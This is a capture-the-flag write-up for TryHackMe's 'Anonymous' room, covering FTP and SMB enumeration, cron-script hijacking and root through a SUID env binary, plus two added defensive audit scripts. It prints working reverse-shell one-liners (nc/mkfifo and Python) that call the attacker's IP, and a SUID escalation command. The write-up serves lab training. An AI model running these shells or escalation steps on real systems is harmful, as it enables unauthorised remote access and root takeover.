This is my writeup for the Anonymous room/machine on the TryHackMe.com platform. Remember, this is just how I solved/owned the machine; there may be different and faster paths, but…
Machine
Not the hacking group
The machine is called Anonymous (room anonymous); the link is https://tryhackme.com/room/anonymous. It is rated as a medium machine, but honestly it is more of an easy one!
With this machine you can refresh privilege escalation and how to gain a foothold through an anonymous FTP server. Remember, the IP changes every time…
Recon
First of all, I run a classic nmap scan:
nmap -sC -sV -p- 10.10.23.85
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-19 05:45 EST
Nmap scan report for 10.10.23.85
Host is up (0.028s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.11.55.171
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx 2 111 113 4096 Jun 04 2020 scripts [NSE: writeable]
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8b:ca:21:62:1c:2b:23:fa:6b:c6:1f:a8:13:fe:1c:68 (RSA)
| 256 95:89:a4:12:e2:e6:ab:90:5d:45:19:ff:41:5f:74:ce (ECDSA)
|_ 256 e1:2a:96:a4:ea:8f:68:8f:cc:74:b8:f0:28:72:70:cd (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: ANONYMOUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: ANONYMOUS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2022-01-19T10:46:15
|_ start_date: N/A
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: anonymous
| NetBIOS computer name: ANONYMOUS\x00
| Domain name: \x00
| FQDN: anonymous
|_ System time: 2022-01-19T10:46:15+00:00
I'm looking at a Linux machine with four ports open: 21, 22, 139 and 445.
First of all, I check the FTP server as the anonymous user (and password):
ftp 10.10.23.85
Connected to 10.10.23.85.
220 NamelessOne's FTP Server!
Name (10.10.23.85:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||21306|)
150 Here comes the directory listing.
drwxrwxrwx 2 111 113 4096 Jun 04 2020 scripts
226 Directory send OK.
ftp> cd scripts
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||62989|)
150 Here comes the directory listing.
-rwxr-xrwx 1 1000 1000 314 Jun 04 2020 clean.sh
-rw-rw-r-- 1 1000 1000 946 Jan 19 10:47 removed_files.log
-rw-r--r-- 1 1000 1000 68 May 12 2020 to_do.txt
There are three files, and the permissions (-rwxr-xrwx) show that I am able to write/overwrite the file named clean.sh. I download all of them:
ftp> get clean.sh
local: clean.sh remote: clean.sh
229 Entering Extended Passive Mode (|||8708|)
150 Opening BINARY mode data connection for clean.sh (314 bytes).
ftp> get removed_files.log
local: removed_files.log remote: removed_files.log
229 Entering Extended Passive Mode (|||34003|)
ftp> get to_do.txt
local: to_do.txt remote: to_do.txt
229 Entering Extended Passive Mode (|||61253|)
ftp> quit
221 Goodbye.
and check them:
cat clean.sh
#!/bin/bash
tmp_files=0
echo $tmp_files
if [ $tmp_files=0 ]
then
echo "Running cleanup script: nothing to delete" >> /var/ftp/scripts/removed_files.log
else
for LINE in $tmp_files; do
rm -rf /tmp/$LINE && echo "$(date) | Removed file /tmp/$LINE" >> /var/ftp/scripts/removed_files.log;done
fi
cat removed_files.log
Running cleanup script: nothing to delete
Running cleanup script: nothing to delete
...
Running cleanup script: nothing to delete
Running cleanup script: nothing to delete
cat to_do.txt
I really need to disable the anonymous login...it's really not safe
The to_do.txt file is just a memo. clean.sh is a bash script that always takes the first (then) branch, since tmp_files is hardcoded to 0, and appends a new row to the log file (removed_files.log) on every run.
If I check the timestamps on the FTP server, I notice that the log file's last-modified time changes every minute. This means the script runs every minute, so there is, probably, a cron job.
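The misconfiguration exploited in this room is a cron job whose script sits in a directory that anonymous FTP users can write to. As an added example (not part of the original writeup), here is a small Python audit that takes crontab text, extracts each scheduled command and reports whether the script or its parent directory is writable by others; the demo() function rebuilds the drwxrwxrwx scripts/ and -rwxr-xrwx clean.sh layout from the FTP listing in a temporary directory, which is a constructed reproduction rather than the target itself.

```python
import os
import stat
import tempfile


def parse_crontab(text):
    """Return the command path of each job line ('* * * * * /path ...')."""
    commands = []
    for line in text.splitlines():
        fields = line.split()
        # Skip blanks, comments, variable assignments and @reboot-style lines.
        if len(fields) < 6 or fields[0].startswith(("#", "@")) or "=" in fields[0]:
            continue
        commands.append(fields[5])
    return commands


def audit_script(path):
    """Findings for one scheduled script: who besides the owner can change it."""
    findings = []
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return ["script missing: a writable parent lets anyone create it"]
    if st.st_mode & stat.S_IWOTH:
        findings.append("script is world-writable")
    if st.st_mode & stat.S_IWGRP and st.st_gid != 0:
        findings.append("script is writable by a non-root group")
    parent = os.stat(os.path.dirname(path) or ".").st_mode
    if parent & stat.S_IWOTH and not parent & stat.S_ISVTX:
        findings.append("parent directory is world-writable without sticky bit")
    return findings


def audit_crontab(text):
    """Map each scheduled command to its findings (empty list means clean)."""
    return {cmd: audit_script(cmd) for cmd in parse_crontab(text)}


def demo():
    """Constructed copy of the target layout: drwxrwxrwx scripts/, -rwxr-xrwx clean.sh."""
    root = tempfile.mkdtemp()
    scripts = os.path.join(root, "scripts")
    os.mkdir(scripts)
    os.chmod(scripts, 0o777)
    clean = os.path.join(scripts, "clean.sh")
    with open(clean, "w") as fh:
        fh.write("#!/bin/bash\n")
    os.chmod(clean, 0o757)
    return audit_crontab("* * * * * " + clean + "\n")[clean]
```

Run against the real crontab of the service account (crontab -l output) the same function flags /var/ftp/scripts/clean.sh on this box; the fix is to make the script and its directory writable only by root and to disable anonymous uploads in vsftpd.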
Let's check the SMB server:
smbclient -L //10.10.23.85
Enter WORKGROUP\kali's password:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
pics Disk My SMB Share Directory for Pics
IPC$ IPC IPC Service (anonymous server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
smbclient //10.10.23.85/pics -U anonymous
Enter WORKGROUP\anonymous's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun May 17 07:11:34 2020
.. D 0 Wed May 13 21:59:10 2020
corgo2.jpg N 42663 Mon May 11 20:43:42 2020
puppos.jpeg N 265188 Mon May 11 20:43:42 2020
20508240 blocks of size 1024. 13306824 blocks available
smb: \> get puppos.jpeg
getting file \puppos.jpeg of size 265188 as puppos.jpeg (787.2 KiloBytes/sec) (average 787.2 KiloBytes/sec)
smb: \> get corgo2.jpg
getting file \corgo2.jpg of size 42663 as corgo2.jpg (145.7 KiloBytes/sec) (average 488.8 KiloBytes/sec)
smb: \>
The share is anonymous too, and it contains just two images in the "pics" folder. Nothing really usable for our purpose.
I'm able to write to the FTP server folder, and I know (or, better, I suspect) that a cron job runs the clean.sh script every minute. The idea is to modify the script, adding a reverse shell, and obtain access as the user.
First of all, I start a netcat listener on my Kali box and modify the script, adding a reverse shell at the top:
vi clean.sh
#!/bin/bash
# the reverse shell:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.55.171 4444>/tmp/f
####################
tmp_files=0
echo $tmp_files
if [ $tmp_files=0 ]
then
echo "Running cleanup script: nothing to delete" >> /var/ftp/scripts/removed_files.log
else
for LINE in $tmp_files; do
rm -rf /tmp/$LINE && echo "$(date) | Removed file /tmp/$LINE" >> /var/ftp/scripts/removed_files.log;done
fi
and I upload the new clean.sh to the FTP server:
ftp> put clean.sh
local: clean.sh remote: clean.sh
229 Entering Extended Passive Mode (|||23628|)
150 Ok to send data.
226 Transfer complete.
In less than a minute a shell appears:
nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.11.55.171] from (UNKNOWN) [10.10.23.85] 54802
/bin/sh: 0: can't access tty; job control turned off
$ ls
pics
user.txt
$ cat user.txt
-----REDACTED----
$ python -c 'import pty; pty.spawn("/bin/bash")'
namelessone@anonymous:~$
namelessone@anonymous:~$ crontab -l
crontab -l
...
* * * * * /var/ftp/scripts/clean.sh
namelessone@anonymous:~$ id
uid=1000(namelessone) gid=1000(namelessone) groups=1000(namelessone),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
Tip
Sometimes the reverse shell used above does not work. If so, use a reverse shell in Python:
/usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.55.171",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
just add it in place of the other one.
Privilege Escalation
I run a check to find whether some executables have the SUID bit set and whether any of them is exploitable:
namelessone@anonymous:~$ find / -type f -perm -04000 -ls 2>/dev/null
find / -type f -perm -04000 -ls 2>/dev/null
66 40 -rwsr-xr-x 1 root root 40152 Oct 10 2019 /snap/core/8268/bin/mount
80 44 -rwsr-xr-x 1 root root 44168 May 7 2014 /snap/core/8268/bin/ping
81 44 -rwsr-xr-x 1 root root 44680 May 7 2014 /snap/core/8268/bin/ping6
98 40 -rwsr-xr-x 1 root root 40128 Mar 25 2019 /snap/core/8268/bin/su
116 27 -rwsr-xr-x 1 root root 27608 Oct 10 2019 /snap/core/8268/bin/umount
2665 71 -rwsr-xr-x 1 root root 71824 Mar 25 2019 /snap/core/8268/usr/bin/chfn
2667 40 -rwsr-xr-x 1 root root 40432 Mar 25 2019 /snap/core/8268/usr/bin/chsh
2743 74 -rwsr-xr-x 1 root root 75304 Mar 25 2019 /snap/core/8268/usr/bin/gpasswd
2835 39 -rwsr-xr-x 1 root root 39904 Mar 25 2019 /snap/core/8268/usr/bin/newgrp
2848 53 -rwsr-xr-x 1 root root 54256 Mar 25 2019 /snap/core/8268/usr/bin/passwd
2958 134 -rwsr-xr-x 1 root root 136808 Oct 11 2019 /snap/core/8268/usr/bin/sudo
3057 42 -rwsr-xr-- 1 root systemd-resolve 42992 Jun 10 2019 /snap/core/8268/usr/lib/dbus-1.0/dbus-daemon-launch-helper
3427 419 -rwsr-xr-x 1 root root 428240 Mar 4 2019 /snap/core/8268/usr/lib/openssh/ssh-keysign
6462 105 -rwsr-sr-x 1 root root 106696 Dec 6 2019 /snap/core/8268/usr/lib/snapd/snap-confine
7636 386 -rwsr-xr-- 1 root dip 394984 Jun 12 2018 /snap/core/8268/usr/sbin/pppd
66 40 -rwsr-xr-x 1 root root 40152 Jan 27 2020 /snap/core/9066/bin/mount
80 44 -rwsr-xr-x 1 root root 44168 May 7 2014 /snap/core/9066/bin/ping
81 44 -rwsr-xr-x 1 root root 44680 May 7 2014 /snap/core/9066/bin/ping6
98 40 -rwsr-xr-x 1 root root 40128 Mar 25 2019 /snap/core/9066/bin/su
116 27 -rwsr-xr-x 1 root root 27608 Jan 27 2020 /snap/core/9066/bin/umount
2670 71 -rwsr-xr-x 1 root root 71824 Mar 25 2019 /snap/core/9066/usr/bin/chfn
2672 40 -rwsr-xr-x 1 root root 40432 Mar 25 2019 /snap/core/9066/usr/bin/chsh
2748 74 -rwsr-xr-x 1 root root 75304 Mar 25 2019 /snap/core/9066/usr/bin/gpasswd
2840 39 -rwsr-xr-x 1 root root 39904 Mar 25 2019 /snap/core/9066/usr/bin/newgrp
2853 53 -rwsr-xr-x 1 root root 54256 Mar 25 2019 /snap/core/9066/usr/bin/passwd
2963 134 -rwsr-xr-x 1 root root 136808 Jan 31 2020 /snap/core/9066/usr/bin/sudo
3062 42 -rwsr-xr-- 1 root systemd-resolve 42992 Nov 29 2019 /snap/core/9066/usr/lib/dbus-1.0/dbus-daemon-launch-helper
3432 419 -rwsr-xr-x 1 root root 428240 Mar 4 2019 /snap/core/9066/usr/lib/openssh/ssh-keysign
6470 109 -rwsr-xr-x 1 root root 110792 Apr 10 2020 /snap/core/9066/usr/lib/snapd/snap-confine
7646 386 -rwsr-xr-- 1 root dip 394984 Feb 11 2020 /snap/core/9066/usr/sbin/pppd
131150 28 -rwsr-xr-x 1 root root 26696 Mar 5 2020 /bin/umount
131140 32 -rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount
131191 64 -rwsr-xr-x 1 root root 64424 Jun 28 2019 /bin/ping
131084 44 -rwsr-xr-x 1 root root 43088 Mar 5 2020 /bin/mount
131207 44 -rwsr-xr-x 1 root root 44664 Mar 22 2019 /bin/su
1050325 100 -rwsr-xr-x 1 root root 100760 Nov 23 2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
919490 44 -rwsr-xr-- 1 root messagebus 42992 Jun 10 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
923989 108 -rwsr-sr-x 1 root root 109432 Oct 30 2019 /usr/lib/snapd/snap-confine
919683 16 -rwsr-xr-x 1 root root 14328 Mar 27 2019 /usr/lib/policykit-1/polkit-agent-helper-1
919497 12 -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
919679 428 -rwsr-xr-x 1 root root 436552 Mar 4 2019 /usr/lib/openssh/ssh-keysign
919144 60 -rwsr-xr-x 1 root root 59640 Mar 22 2019 /usr/bin/passwd
918992 36 -rwsr-xr-x 1 root root 35000 Jan 18 2018 /usr/bin/env
919017 76 -rwsr-xr-x 1 root root 75824 Mar 22 2019 /usr/bin/gpasswd
919128 40 -rwsr-xr-x 1 root root 37136 Mar 22 2019 /usr/bin/newuidmap
919127 40 -rwsr-xr-x 1 root root 40344 Mar 22 2019 /usr/bin/newgrp
918924 44 -rwsr-xr-x 1 root root 44528 Mar 22 2019 /usr/bin/chsh
919126 40 -rwsr-xr-x 1 root root 37136 Mar 22 2019 /usr/bin/newgidmap
918922 76 -rwsr-xr-x 1 root root 76496 Mar 22 2019 /usr/bin/chfn
919269 148 -rwsr-xr-x 1 root root 149080 Jan 31 2020 /usr/bin/sudo
919305 20 -rwsr-xr-x 1 root root 18448 Jun 28 2019 /usr/bin/traceroute6.iputils
918871 52 -rwsr-sr-x 1 daemon daemon 51464 Feb 20 2018 /usr/bin/at
919164 24 -rwsr-xr-x 1 root root 22520 Mar 27 2019 /usr/bin/pkexec
The env binary has the SUID bit set and, according to GTFOBins, it is exploitable…let's try:
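The long listing above is easy to skim past; what a defender wants is a diff against what should be setuid on the image. As an added example (not part of the original writeup), this Python parses lines in the find -ls format shown above and reports setuid-root files that are not in a baseline. The BASELINE set is an assumption standing in for a golden list captured from a clean build of the same image, and SAMPLE is a constructed subset of the listing; /usr/bin/env is flagged because it is not setuid on a default Ubuntu install.

```python
import re

# Columns of `find -ls`: inode, blocks, mode, links, owner, group, size, date (3 fields), path.
LS_RE = re.compile(
    r"^\s*\d+\s+\d+\s+(?P<mode>\S{10})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)"
    r"\s+\d+\s+\S+\s+\S+\s+\S+\s+(?P<path>\S+)$"
)

# Assumed baseline: setuid-root programs expected on this image (illustrative, not
# a real golden list; capture one from a clean build of the same image in practice).
BASELINE = {
    "/bin/mount", "/bin/umount", "/bin/su", "/bin/ping", "/bin/fusermount",
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/pkexec",
}


def parse_find_ls(text):
    """Yield (mode, owner, group, path) for every well-formed `find -ls` line."""
    for line in text.splitlines():
        m = LS_RE.match(line)
        if m:
            yield m.group("mode"), m.group("owner"), m.group("group"), m.group("path")


def unexpected_setuid(text, baseline=BASELINE):
    """Return setuid-root paths that are not in the baseline.

    Snap images are skipped: they are read-only squashfs copies of a base
    system, not binaries on the live root filesystem.
    """
    hits = []
    for mode, owner, _group, path in parse_find_ls(text):
        if mode[3] not in "sS" or owner != "root":
            continue  # only setuid-root files are in scope here
        if path.startswith("/snap/"):
            continue
        if path not in baseline:
            hits.append(path)
    return hits


# Constructed sample in the page's `find -ls` format (lines taken from the listing above).
SAMPLE = """\
131207 44 -rwsr-xr-x 1 root root 44664 Mar 22 2019 /bin/su
918992 36 -rwsr-xr-x 1 root root 35000 Jan 18 2018 /usr/bin/env
918871 52 -rwsr-sr-x 1 daemon daemon 51464 Feb 20 2018 /usr/bin/at
98 40 -rwsr-xr-x 1 root root 40128 Mar 25 2019 /snap/core/9066/bin/su
"""
```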
namelessone@anonymous:/etc$ /usr/bin/env /bin/sh -p
/usr/bin/env /bin/sh -p
# id
id
uid=1000(namelessone) gid=1000(namelessone) euid=0(root) groups=1000(namelessone),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
# cd /root
cd /root
# ls -ltra
ls -ltra
total 60
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc
drwx------ 2 root root 4096 May 11 2020 .ssh
lrwxrwxrwx 1 root root 9 May 11 2020 .bash_history -> /dev/null
drwx------ 3 root root 4096 May 11 2020 .gnupg
drwx------ 2 root root 4096 May 11 2020 .cache
-rw-r--r-- 1 root root 33 May 11 2020 root.txt
-rw-r--r-- 1 root root 66 May 11 2020 .selected_editor
drwxr-xr-x 3 root root 4096 May 11 2020 .local
drwxr-xr-x 24 root root 4096 May 12 2020 ..
-rw------- 1 root root 55 May 14 2020 .Xauthority
-rw------- 1 root root 13795 May 17 2020 .viminfo
drwx------ 6 root root 4096 May 17 2020 .
# cat root.txt
cat root.txt
----REDACTED----
Oh yes, it was usable, and I got an euid (effective user ID) of root. Machine owned.